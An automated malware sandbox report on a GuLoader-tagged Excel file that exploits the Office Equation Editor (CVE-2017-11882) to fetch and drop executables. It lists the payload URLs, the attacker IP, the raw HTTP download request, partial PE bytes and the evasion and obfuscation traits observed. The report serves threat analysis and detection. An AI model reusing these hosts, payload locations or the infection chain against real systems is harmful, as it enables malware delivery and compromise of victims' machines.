Windows Analysis Report 70A and 90A, quantity 20000 tons.xlsx

Overview

General Information

Sample Name: 70A and 90A, quantity 20000 tons.xlsx
Analysis ID: 483688
MD5: 3768dc6c162a6eb46c160c48916f76d2
SHA1: 3387bace48ffd1c07cb17b99e6c7919e11bbc508
SHA256: 5a95734977adad3b8ab8c71070fd89958b0ab5e756f297cf3303c697728f3ce9
Tags: GuLoaderVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000006.00000002.690715580.00000000002A0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1xnnBgB9%"}
Multi AV Scanner detection for submitted file
Source: 70A and 90A, quantity 20000 tons.xlsx Virustotal: Detection: 31% Perma Link
Source: 70A and 90A, quantity 20000 tons.xlsx ReversingLabs: Detection: 30%
Multi AV Scanner detection for domain / URL
Source: http://192.3.141.149/fresh/SENSATIO.exe Virustotal: Detection: 10% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SENSATIO[1].exe Virustotal: Detection: 20% Perma Link
Source: C:\Users\Public\vbc.exe Virustotal: Detection: 20% Perma Link

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov eax, eax 6_2_004027C4
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.3.141.149:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.3.141.149:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 70MB

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=1xnnBgB9%
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 192.3.141.149 192.3.141.149
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Sep 2021 09:38:12 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/8.0.10Last-Modified: Tue, 14 Sep 2021 21:21:52 GMTETag: "1c000-5cbfb2b957c00"Accept-Ranges: bytesContent-Length: 114688Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 75 9f f9 db 31 fe 97 88 31 fe 97 88 31 fe 97 88 b2 e2 99 88 30 fe 97 88 7e dc 9e 88 30 fe 97 88 07 d8 9a 88 30 fe 97 88 52 69 63 68 31 fe 97 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 80 0a b3 4e 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 01 00 00 50 00 00 00 00 00 00 00 15 00 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 42 00 00 00 04 00 00 00 00 00 00 00 00 c0 01 00 00 10 00 00 2d e6 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 66 01 00 28 00 00 00 00 80 01 00 c6 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 5b 01 00 00 10 00 00 00 60 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 34 0a 00 00 00 70 01 00 00 10 00 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c6 31 00 00 00 80 01 00 00 40 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /fresh/SENSATIO.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.141.149Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.149
Source: vbc.exe, 00000006.00000002.692357733.00000000028C7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.692357733.00000000028C7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.692357733.00000000028C7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.692357733.00000000028C7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: 96D57846.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.692357733.00000000028C7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96D57846.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /fresh/SENSATIO.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.141.149Connection: Keep-Alive

System Summary:

barindex
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SENSATIO[1].exe Jump to dropped file
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040284D 6_2_0040284D
Source: C:\Users\Public\vbc.exe Code function: 6_2_004028E6 6_2_004028E6
Source: C:\Users\Public\vbc.exe Code function: 6_2_004027C4 6_2_004027C4
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A6377 6_2_002A6377
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A7C0B 6_2_002A7C0B
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A2E1D 6_2_002A2E1D
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A8A12 6_2_002A8A12
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A6817 6_2_002A6817
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A946C 6_2_002A946C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A4662 6_2_002A4662
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A087D 6_2_002A087D
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A1E72 6_2_002A1E72
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A3271 6_2_002A3271
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A1277 6_2_002A1277
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A224E 6_2_002A224E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A025A 6_2_002A025A
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A3E5E 6_2_002A3E5E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A2852 6_2_002A2852
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A2250 6_2_002A2250
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A2CA5 6_2_002A2CA5
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A1EB9 6_2_002A1EB9
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A22BD 6_2_002A22BD
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A8CB3 6_2_002A8CB3
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A8AB1 6_2_002A8AB1
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A208E 6_2_002A208E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A0E8E 6_2_002A0E8E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A1685 6_2_002A1685
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A189D 6_2_002A189D
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A0A97 6_2_002A0A97
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A4CE8 6_2_002A4CE8
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A50EF 6_2_002A50EF
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A02F9 6_2_002A02F9
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A8CC9 6_2_002A8CC9
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A04DB 6_2_002A04DB
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A96DE 6_2_002A96DE
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A332B 6_2_002A332B
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A8F27 6_2_002A8F27
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A973E 6_2_002A973E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A1B3F 6_2_002A1B3F
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A7B0D 6_2_002A7B0D
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A1913 6_2_002A1913
Source: C:\Users\Public\vbc.exe Code function: 6_2_002AA517 6_2_002AA517
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A0F68 6_2_002A0F68
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A076C 6_2_002A076C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A2F60 6_2_002A2F60
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A4B40 6_2_002A4B40
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A875A 6_2_002A875A
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A6350 6_2_002A6350
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A91AB 6_2_002A91AB
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A6350 6_2_002A6350
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A55AD 6_2_002A55AD
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A0BA2 6_2_002A0BA2
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A1DA0 6_2_002A1DA0
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A53B8 6_2_002A53B8
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A0B88 6_2_002A0B88
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A8981 6_2_002A8981
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A219D 6_2_002A219D
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A4BE9 6_2_002A4BE9
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A49E0 6_2_002A49E0
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A13CB 6_2_002A13CB
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A41CE 6_2_002A41CE
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A19CE 6_2_002A19CE
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A9FC6 6_2_002A9FC6
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A29C5 6_2_002A29C5
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A95DA 6_2_002A95DA
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A53D8 6_2_002A53D8
Source: C:\Users\Public\vbc.exe Code function: 6_2_002AA5D0 6_2_002AA5D0
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A25D7 6_2_002A25D7
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A6377 NtAllocateVirtualMemory, 6_2_002A6377
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A6350 NtAllocateVirtualMemory, 6_2_002A6350
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A6350 NtAllocateVirtualMemory, 6_2_002A6350
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A63BB NtAllocateVirtualMemory, 6_2_002A63BB
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
PE file contains strange resources
Source: SENSATIO[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: 70A and 90A, quantity 20000 tons.xlsx Virustotal: Detection: 31%
Source: 70A and 90A, quantity 20000 tons.xlsx ReversingLabs: Detection: 30%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$70A and 90A, quantity 20000 tons.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRFA16.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.winXLSX@4/21@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.690715580.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00406848 push edx; ret 6_2_0040696F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00403E49 push ecx; ret 6_2_00403E91
Source: C:\Users\Public\vbc.exe Code function: 6_2_00404E5E push 00000055h; ret 6_2_00404E7D
Source: C:\Users\Public\vbc.exe Code function: 6_2_00403868 push 00000012h; retf 6_2_004038BD
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040886D push edx; ret 6_2_004088AD
Source: C:\Users\Public\vbc.exe Code function: 6_2_00407676 pushad ; ret 6_2_00407679
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040442D push esp; ret 6_2_00404439
Source: C:\Users\Public\vbc.exe Code function: 6_2_00406A30 push esp; ret 6_2_00406A91
Source: C:\Users\Public\vbc.exe Code function: 6_2_00408E36 push edx; ret 6_2_00408E41
Source: C:\Users\Public\vbc.exe Code function: 6_2_004054C9 push edx; ret 6_2_004054E5
Source: C:\Users\Public\vbc.exe Code function: 6_2_00406ED5 push esi; ret 6_2_00406EED
Source: C:\Users\Public\vbc.exe Code function: 6_2_004078DF push ss; iretd 6_2_004078E0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00403AF4 push esp; ret 6_2_00403C81
Source: C:\Users\Public\vbc.exe Code function: 6_2_004090F7 push edx; ret 6_2_00409105
Source: C:\Users\Public\vbc.exe Code function: 6_2_004050F8 push edx; ret 6_2_004050F9
Source: C:\Users\Public\vbc.exe Code function: 6_2_004078F9 push esp; ret 6_2_00407901
Source: C:\Users\Public\vbc.exe Code function: 6_2_00404E85 push edi; ret 6_2_00404E95
Source: C:\Users\Public\vbc.exe Code function: 6_2_00409887 push ss; ret 6_2_00409938
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040468F push ecx; iretd 6_2_004046B7
Source: C:\Users\Public\vbc.exe Code function: 6_2_00406A92 push esp; ret 6_2_00406A91
Source: C:\Users\Public\vbc.exe Code function: 6_2_00407B45 push eax; ret 6_2_00407B46
Source: C:\Users\Public\vbc.exe Code function: 6_2_00409945 push esp; ret 6_2_00409951
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405F51 push edx; ret 6_2_00405F91
Source: C:\Users\Public\vbc.exe Code function: 6_2_00403952 push 00000012h; retf 6_2_004038BD
Source: C:\Users\Public\vbc.exe Code function: 6_2_00404F54 push esi; ret 6_2_00404F55
Source: C:\Users\Public\vbc.exe Code function: 6_2_00403B66 push esp; ret 6_2_00403C81
Source: C:\Users\Public\vbc.exe Code function: 6_2_00408769 push edx; ret 6_2_004088AD
Source: C:\Users\Public\vbc.exe Code function: 6_2_00408B6B push esp; iretd 6_2_00408B6C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040956C push ebp; ret 6_2_0040956D
Source: C:\Users\Public\vbc.exe Code function: 6_2_00404174 push esp; ret 6_2_00404175
Source: C:\Users\Public\vbc.exe Code function: 6_2_00407F79 push esi; ret 6_2_00407F91

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SENSATIO[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2816 Thread sleep time: -360000s >= -30000s Jump to behavior
